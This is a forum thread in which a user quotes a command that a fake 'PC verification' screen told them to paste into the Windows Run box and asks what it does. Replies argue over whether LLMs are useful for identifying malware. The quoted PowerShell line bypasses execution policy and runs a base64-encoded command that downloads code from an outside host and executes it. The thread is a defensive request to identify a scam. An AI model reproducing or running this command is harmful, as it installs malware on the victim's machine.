Yeah don’t put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

  • geekwithsoul@lemm.ee
    link
    fedilink
    English
    arrow-up
    2
    arrow-down
    2
    ·
    edit-2
    7 days ago

    Okay but pretty much any malware is going to follow those same steps - they’re what makes it malware. The LLM doesn’t “prove” anything - it’s not examining the executable, it’s not setting up a VM and doing deep packet analysis to see how the malware operates. It’s just parroting back the fact this is malware with details seeded from the prompt. This is like yelling into a canyon and “proving” someone is stuck in the canyon and yelling because you heard an echo.

    No one should be using an LLM as a security backstop. It’s only going to catch the things that have already been seen before, and the minute a bad actor introduces something the least bit novel in the attack, the LLM is confidently going to say it isn’t malware because it hasn’t seen it before. A simple web search would have turned up essentially the same information and used only a small fraction of the resources.

    • Otter@lemmy.ca
      link
      fedilink
      English
      arrow-up
      5
      arrow-down
      1
      ·
      7 days ago

      That’s not what I meant though, I said that it speeds up the process of looking it up. It’s about as good as an unreliable peer that tells you what it thinks is happening. I can then research it myself based on the keywords that it mentions.

      It is similar to a web search, but with how bad search results are these days (a large part because of other people making LLM generated garbage articles), I find that asking a locally hosted LLM will give me a better starting point. Since it’s running on my own simple hardware, I’m not as worried about the resource cost compared to the tech companies’ ones.

      I agree with everything else you’ve said though